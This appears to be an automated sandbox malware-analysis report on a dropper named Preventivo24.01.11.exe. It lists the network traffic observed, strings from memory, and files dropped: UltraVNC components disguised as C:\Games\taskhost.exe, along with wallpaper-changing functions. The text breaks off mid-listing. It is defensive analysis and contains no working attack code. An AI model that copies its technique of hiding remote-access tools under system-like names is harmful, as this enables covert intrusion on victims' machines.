Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic	HTTP traffic detected: GET /download/updates.txt HTTP/1.1Accept: /User-Agent: AdvancedInstallerHost: www.example.comConnection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: www.example.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundAccept-Ranges: bytesAge: 590017Cache-Control: max-age=604800Content-Type: text/html; charset=UTF-8Date: Tue, 23 Jan 2024 11:17:59 GMTExpires: Tue, 30 Jan 2024 11:17:59 GMTLast-Modified: Tue, 16 Jan 2024 15:24:22 GMTServer: ECS (agb/52BB)Vary: Accept-EncodingX-Cache: 404-HITContent-Length: 1256Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 2

Source: shi6E82.tmp.0.dr	String found in binary or memory: http://.css
Source: shi6E82.tmp.0.dr	String found in binary or memory: http://.jpg
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000002.1700517838.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1699048395.0000000000961000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000003.1699814897.0000000000923000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.1700478610.0000000000924000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Preventivo24.01.11.exe, 00000000.00000003.1659305606.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?31abf359f1d5f
Source: shi6E82.tmp.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0A6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000000.1860708223.0000000000203000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0R
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://s.symcd.com06
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://t2.symcb.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://tl.symcd.com0&
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.dr	String found in binary or memory: http://www.pdf-tools.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: taskhost.exe.0.dr	String found in binary or memory: https://forum.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://forum.uvnc.comvncMenu::WndProc
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr	String found in binary or memory: https://www.thawte.com/repository0W
Source: taskhost.exe.0.dr	String found in binary or memory: https://www.uvnc.com
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://www.uvnc.comcmd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr	String found in binary or memory: https://www.uvnc.comhttps://forum.uvnc.comnet

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Games\taskhost.exe

Code function: 41_2_001154D0 SystemParametersInfoA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_0100AD30 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F773D0 GetSystemDirectoryW,LoadLibraryExW,NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F005B0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E98520 SysFreeString,SysAllocString,GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,SysFreeString,SysFreeString,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EAEA60 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E98BD0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA2CE0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E9ADD0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DestroyWindow,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EBCDD0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA2E50 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA9070 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E9B5C0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F555C0 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E9BC20 NtdllDefWindowProc_W,
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00E97D50 GetWindowLongW,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,GetWindowLongW,NtdllDefWindowProc_W,SetWindowTextW,GlobalAlloc,GlobalLock,GlobalUnlock,SetWindowLongW,NtdllDefWindowProc_W,

Source: C:\Games\taskhost.exe

Code function: 41_2_000CB8D0 wsprintfA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStructA,WritePrivateProfileStructA,WritePrivateProfileStructA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,W